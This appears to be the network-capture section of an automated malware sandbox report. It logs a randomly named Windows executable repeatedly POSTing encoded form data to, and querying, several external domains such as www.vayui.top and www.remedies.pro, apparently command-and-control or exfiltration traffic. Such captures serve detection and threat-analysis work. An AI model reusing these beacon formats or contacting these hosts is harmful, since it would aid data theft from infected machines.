2 | 192.168.2.7 | 49812 | 156.251.17.224 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:31:42.747390032 CET | 770 | OUT | POST /fyc8/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.duwixushx.xyz
Origin: http://www.duwixushx.xyz
Content-Length: 239
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.duwixushx.xyz/fyc8/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=woGE44KVe1zz3M5sFEm1U2guSvo1gZkLjJdIYXfFMJi4p5IwpVwrjb+Mhza/5xmSIrcIeTP+4q4pmgB046PA3uZS7AQn8z2KDBokGThbJA2BW629VxjbBoIc//QmI8uDAafHzF93DYt+ohWyhkuic0NLTI71GSst0KanNUV/Lh8vaIbTFqIK3yXC7KAQyJdRcYkVvzH0PEYzEuWL2AnC8GSs5RjVWfKvv8jij8Q=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49818 | 156.251.17.224 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:31:45.408376932 CET | 1783 | OUT | POST /fyc8/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.duwixushx.xyz
Origin: http://www.duwixushx.xyz
Content-Length: 1251
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.duwixushx.xyz/fyc8/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49825 | 156.251.17.224 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:31:48.059942961 CET | 491 | OUT | GET /fyc8/?GhEtuH=9quk7MnvWgGB/+oSKiWFDzYoPJYT6eA3ueh2PF/6PpTLuIpSuGh5poP5vhKU1hzLJrxVAWnbk59J+ABTrLnIqcNR2VABk2apNjRDHz4+NFXCe5SYECaGO4YN/+FCU+q/RL6A2UBNebQ0&9hy=gvrDS8U8OP HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.duwixushx.xyz
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 4, 2024 15:31:49.734977007 CET | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 Dec 2024 14:31:49 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49842 | 172.67.145.234 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:31:55.184544086 CET | 738 | OUT | POST /t4v0/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.vayui.top
Origin: http://www.vayui.top
Content-Length: 219
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.vayui.top/t4v0/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 4d 59 69 6b 41 2b 61 61 6f 63 48 41 2f 70 64 37 77 2f 6e 6c 30 74 55 71 2b 6c 4d 75 52 31 49 76 45 59 57 65 68 6b 37 59 71 66 51 78 6c 32 45 77 48 30 2f 39 4b 55 52 6a 30 43 57 77 77 75 78 4f 74 51 6d 6a 31 32 70 4c 56 4c 57 6d 75 43 51 76 37 39 2f 69 70 66 71 41 41 42 59 56 73 4e 32 74 44 38 54 62 6e 39 7a 41 75 6f 45 65 31 4a 78 6a 6a 31 73 37 45 74 35 2f 6d 68 55 52 4a 50 65 57 65 48 51 58 7a 43 56 2f 4b 4f 56 34 59 63 6b 6c 4e 6a 4c 30 57 51 63 52 6e 41 34 45 52 72 46 67 4a 78 4e 57 30 74 57 76 72 51 54 4c 71 36 32 48 67 6e 69 43 62 66 6b 30 69 5a 6b 6d 76 73 70 66 6c 34 43 65 6e 6a 69 38 37 6f 75 44 2b 39 5a 6c 66 67 3d 3d
                                                                                Data Ascii: GhEtuH=MYikA+aaocHA/pd7w/nl0tUq+lMuR1IvEYWehk7YqfQxl2EwH0/9KURj0CWwwuxOtQmj12pLVLWmuCQv79/ipfqAABYVsN2tD8Tbn9zAuoEe1Jxjj1s7Et5/mhURJPeWeHQXzCV/KOV4YcklNjL0WQcRnA4ERrFgJxNW0tWvrQTLq62HgniCbfk0iZkmvspfl4Cenji87ouD+9Zlfg==
                                                                                Dec 4, 2024 15:31:56.567378044 CET  910                IN         HTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:31:56 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L5K3JaNCNdMZuzO%2FzysS2IExwivlQI3M2Q7OC4QPCUv%2BPSQlrTn6HpiuoNVXdb6Iyv2mg7f9%2FzVDvdu%2Fb48Dg%2Ff640TWSRQ78OM170OHvAihMEcbIBgvzJ93aRAjFBfK"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc80c07ea0431a-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=738&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                6           192.168.2.7  49846        172.67.145.234  80                7000  C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                Timestamp                           Bytes transferred  Direction  Data
                                                                                Dec 4, 2024 15:31:57.850023031 CET  758                OUT        POST /t4v0/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Content-Length: 239
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.vayui.top/t4v0/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 4d 59 69 6b 41 2b 61 61 6f 63 48 41 2b 4a 4e 37 32 59 54 6c 6a 39 55 74 77 46 4d 75 65 56 49 72 45 59 53 65 68 6c 2f 49 72 71 34 78 6d 54 41 77 47 32 48 39 48 30 52 6a 2f 69 57 70 74 2b 78 37 74 51 36 42 31 33 56 4c 56 4c 43 6d 75 48 55 76 36 4b 6a 6a 70 50 71 43 62 52 59 58 69 74 32 74 44 38 54 62 6e 39 6e 6d 75 6f 4d 65 31 34 42 6a 67 55 73 34 4a 4e 35 38 68 68 55 52 4e 50 65 53 65 48 51 70 7a 44 35 5a 4b 4d 74 34 59 59 6f 6c 4b 78 76 33 4e 67 63 58 74 67 34 52 56 4a 70 6f 46 42 42 4e 2b 37 4b 41 72 51 58 36 69 73 33 6c 36 46 75 75 46 4f 63 50 6d 62 41 51 34 4b 30 71 6e 35 47 47 71 42 57 64 6b 66 4c 70 7a 76 34 68 4a 51 43 43 33 4b 43 4c 4c 54 55 69 73 72 46 4c 34 46 2f 51 36 75 55 3d
                                                                                Data Ascii: GhEtuH=MYikA+aaocHA+JN72YTlj9UtwFMueVIrEYSehl/Irq4xmTAwG2H9H0Rj/iWpt+x7tQ6B13VLVLCmuHUv6KjjpPqCbRYXit2tD8Tbn9nmuoMe14BjgUs4JN58hhURNPeSeHQpzD5ZKMt4YYolKxv3NgcXtg4RVJpoFBBN+7KArQX6is3l6FuuFOcPmbAQ4K0qn5GGqBWdkfLpzv4hJQCC3KCLLTUisrFL4F/Q6uU=
                                                                                Dec 4, 2024 15:31:59.217195988 CET  906                IN         HTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:31:59 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VziJ2wwLAzfONIBWpdVJNOSz6p%2FRpPbEpeG0HHnLhHVZqJxGPqvNjMFVSCaF%2Fw6H28ggUgyrUfLRsdWK39X2TpQN6CxdlI8B4ykZHbu4dOcH%2FmSqE0uaKW7F4OsHmjBw"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc80d10dc17c69-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                7           192.168.2.7  49850        172.67.145.234  80                7000  C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                Timestamp                           Bytes transferred  Direction  Data
                                                                                Dec 4, 2024 15:32:00.614108086 CET  1771               OUT        POST /t4v0/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Content-Length: 1251
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.vayui.top/t4v0/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 4d 59 69 6b 41 2b 61 61 6f 63 48 41 2b 4a 4e 37 32 59 54 6c 6a 39 55 74 77 46 4d 75 65 56 49 72 45 59 53 65 68 6c 2f 49 72 71 67 78 6c 68 49 77 48 52 72 39 49 55 52 6a 6b 43 57 30 74 2b 78 69 74 51 79 46 31 33 5a 78 56 4a 36 6d 38 78 6f 76 72 50 58 6a 6d 50 71 43 53 78 59 55 73 4e 33 33 44 34 50 58 6e 39 33 6d 75 6f 4d 65 31 37 5a 6a 32 31 73 34 4c 4e 35 2f 6d 68 55 72 4a 50 65 36 65 48 59 66 7a 44 4e 57 4c 39 4e 34 5a 34 34 6c 4d 43 4c 33 42 67 63 56 75 67 35 55 56 4a 6b 32 46 41 74 76 2b 37 57 71 72 58 6a 36 79 59 47 65 71 32 2b 6b 55 4e 77 50 6c 71 6f 58 78 37 56 61 69 34 71 6e 76 41 43 4f 67 50 54 48 71 65 6f 32 64 58 58 41 6a 62 66 68 49 53 73 6c 6a 62 51 43 6f 55 6e 71 6b 37 4f 71 2f 49 5a 65 77 61 35 77 55 41 54 43 34 63 4e 69 77 50 78 4d 6e 43 6b 32 46 52 4f 47 68 79 48 45 51 30 56 30 34 79 33 6b 44 4c 31 32 51 5a 59 69 72 42 46 79 52 74 79 75 6d 6f 35 6a 76 73 50 6f 70 42 4f 71 57 6c 73 6d 35 2f 7a 52 43 78 62 4a 59 37 52 56 32 4e 70 70 45 65 36 68 63 75 39 49 79 51 4f [TRUNCATED]
                                                                                Data Ascii: GhEtuH=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 [TRUNCATED]
                                                                                Dec 4, 2024 15:32:01.964569092 CET  910                IN         HTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:32:01 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7Vsc7NGA4n8k32ZoAsbwPevv50no6lWQvkG155Heu4pSJ8GF3T%2FfsAKxyLNzhA37lho8OAcXmqKqNl9uYCISyB6EoaE9HvWHsnZBcYHR3x6qXbhrTqO%2BQJeYli%2B5BOL"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc80e1abfc4295-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=13333&min_rtt=13333&rtt_var=6666&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1771&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                8           192.168.2.7  49856        172.67.145.234  80                7000  C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                Timestamp                           Bytes transferred  Direction  Data
                                                                                Dec 4, 2024 15:32:03.380013943 CET  487                OUT        GET /t4v0/?GhEtuH=BaKEDIuCqsvR37Bn6+TgiJMwkxJzDUIqAYq0m1TFifk8gDAIMlekNhph8Tar9Z0dtwi6g0hFX56VxC4Q/su0r8fyWQFgq8KpC42yk6uDr99A+ZghhUp+L9tXlGYeR9GDO3Mz2SBmPslm&9hy=gvrDS8U8OP HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.vayui.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Dec 4, 2024 15:32:04.686894894 CET  928                IN         HTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:32:04 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aXv0XkDv6GV8NH9ejLZbzSOne8aUNPi%2BrB3rpa5pcQNGtoc3cWQB%2FHM%2FxP09zwtL%2F%2F61P3H4F4NAe3cxnNAHZxaU%2F9vS9g2wz6BjJtlcLxQ3txTHWlYRUKOMNJDgOXBL"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc80f33b267285-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=13486&min_rtt=13486&rtt_var=6743&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                9           192.168.2.7  49870        13.248.169.48   80                7000  C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                Timestamp                           Bytes transferred  Direction  Data
                                                                                Dec 4, 2024 15:32:10.584470987 CET  747                OUT        POST /4azw/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.remedies.pro
                                                                                Origin: http://www.remedies.pro
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.remedies.pro/4azw/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 76 50 4d 63 51 6b 66 68 7a 37 49 54 36 31 36 66 70 72 72 35 71 56 77 48 31 56 37 78 59 62 6a 42 32 6f 78 2f 6c 63 31 52 53 38 5a 51 4f 75 71 41 4d 6d 59 31 66 68 72 68 75 6b 66 64 33 79 4d 69 51 64 39 73 78 56 42 6e 77 4d 4f 5a 71 5a 55 50 68 5a 6d 4a 69 4b 70 72 71 54 50 70 51 6b 64 31 67 32 6b 52 43 35 35 67 7a 6a 75 36 76 63 61 4e 35 34 38 68 59 73 38 63 30 54 50 5a 31 6a 45 2f 42 37 49 34 46 48 67 64 48 31 5a 6d 7a 33 38 72 55 30 4a 72 66 7a 47 46 56 2b 4a 4f 46 61 66 44 65 34 36 51 58 31 76 72 55 43 56 41 65 61 4f 56 79 46 6f 41 76 55 59 6d 69 43 79 44 71 65 2f 69 49 61 73 68 46 50 56 4e 6f 59 52 56 4e 6e 71 57 72 77 3d 3d
                                                                                Data Ascii: GhEtuH=vPMcQkfhz7IT616fprr5qVwH1V7xYbjB2ox/lc1RS8ZQOuqAMmY1fhrhukfd3yMiQd9sxVBnwMOZqZUPhZmJiKprqTPpQkd1g2kRC55gzju6vcaN548hYs8c0TPZ1jE/B7I4FHgdH1Zmz38rU0JrfzGFV+JOFafDe46QX1vrUCVAeaOVyFoAvUYmiCyDqe/iIashFPVNoYRVNnqWrw==


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                10          192.168.2.7  49877        13.248.169.48   80                7000  C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                Timestamp                           Bytes transferred  Direction  Data
                                                                                Dec 4, 2024 15:32:13.334724903 CET  767                OUT        POST /4azw/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.remedies.pro
                                                                                Origin: http://www.remedies.pro
                                                                                Content-Length: 239
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.remedies.pro/4azw/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 76 50 4d 63 51 6b 66 68 7a 37 49 54 6f 47 69 66 36 61 72 35 68 56 77 49 77 56 37 78 57 37 6a 46 32 6f 39 2f 6c 5a 4e 42 52 50 39 51 58 4b 6d 41 4e 69 73 31 53 42 72 68 6b 45 66 69 36 53 4e 67 51 64 35 4b 78 55 39 6e 77 4d 4b 5a 71 64 45 50 68 4b 2b 47 77 4b 70 70 68 7a 50 52 49 45 64 31 67 32 6b 52 43 35 74 61 7a 6a 57 36 6f 74 71 4e 72 72 6b 67 52 4d 38 66 31 54 50 5a 69 54 45 37 42 37 4a 64 46 43 34 33 48 32 68 6d 7a 31 30 72 55 46 4a 6f 57 7a 47 48 62 65 49 65 46 61 58 49 62 39 65 75 53 58 32 33 53 51 30 6e 62 73 50 33 6f 6e 6b 73 78 46 67 64 6d 41 57 31 39 34 69 58 4b 62 6f 35 49 74 68 73 33 76 30 2f 41 31 4c 53 39 4c 49 6c 32 57 49 31 78 55 68 57 54 79 36 2b 69 64 4b 31 34 65 73 3d
                                                                                Data Ascii: GhEtuH=vPMcQkfhz7IToGif6ar5hVwIwV7xW7jF2o9/lZNBRP9QXKmANis1SBrhkEfi6SNgQd5KxU9nwMKZqdEPhK+GwKpphzPRIEd1g2kRC5tazjW6otqNrrkgRM8f1TPZiTE7B7JdFC43H2hmz10rUFJoWzGHbeIeFaXIb9euSX23SQ0nbsP3onksxFgdmAW194iXKbo5Iths3v0/A1LS9LIl2WI1xUhWTy6+idK14es=


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                11          192.168.2.7  49885        13.248.169.48   80                7000  C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                Timestamp                           Bytes transferred  Direction  Data
                                                                                Dec 4, 2024 15:32:16.003022909 CET  1780               OUT        POST /4azw/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.remedies.pro
                                                                                Origin: http://www.remedies.pro
                                                                                Content-Length: 1251
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.remedies.pro/4azw/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 76 50 4d 63 51 6b 66 68 7a 37 49 54 6f 47 69 66 36 61 72 35 68 56 77 49 77 56 37 78 57 37 6a 46 32 6f 39 2f 6c 5a 4e 42 52 50 31 51 4c 70 75 41 50 44 73 31 54 42 72 68 6f 6b 66 5a 36 53 4e 68 51 64 42 47 78 55 78 64 77 4b 57 5a 72 36 73 50 30 4c 2b 47 71 61 70 70 75 54 50 71 51 6b 63 78 67 32 55 72 43 35 39 61 7a 6a 57 36 6f 75 79 4e 6f 34 38 67 64 73 38 63 30 54 50 46 31 6a 45 44 42 37 51 67 46 43 30 4e 48 47 42 6d 7a 57 63 72 50 58 52 6f 5a 7a 47 42 4f 65 4a 62 46 61 4b 51 62 39 71 49 53 57 54 53 53 54 6b 6e 5a 37 2b 58 34 48 6b 6d 6d 6c 38 49 75 6a 36 41 79 4a 4f 54 56 70 74 4f 44 38 4e 44 79 64 51 32 45 47 36 62 33 38 35 61 75 47 45 69 31 78 39 2b 64 31 2f 78 36 34 48 71 6c 49 6f 35 6e 62 49 4e 47 49 36 52 4e 68 30 63 79 46 77 73 48 6b 4c 37 4f 6c 43 72 34 73 45 47 72 50 47 57 4b 61 44 53 32 33 37 51 6d 33 55 77 50 6f 37 59 2f 45 46 41 34 39 38 6f 33 48 6a 63 4b 38 48 49 6f 54 32 55 51 78 76 74 35 76 4e 42 39 44 69 62 37 78 41 4f 4c 48 33 75 71 54 69 33 43 79 56 36 45 32 6a [TRUNCATED]
                                                                                Data Ascii: GhEtuH=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 [TRUNCATED]


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                12          192.168.2.7  49891        13.248.169.48   80                7000  C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                Timestamp                           Bytes transferred  Direction  Data
                                                                                Dec 4, 2024 15:32:18.668330908 CET  490                OUT        GET /4azw/?GhEtuH=iNk8TUzs4LA0xmLiyfXL0hgGjATAFsDni+5ztJ1xT71fUrCnNyUyZAqYt2rVyg4lMrt3jHF8wf6EsZ4R3qyrto5tvwrKQEVqglgZMsYf2yPShcLO5aI9UsQg5wD70CMaNZMdAFkLH0kf&9hy=gvrDS8U8OP HTTP/1.1
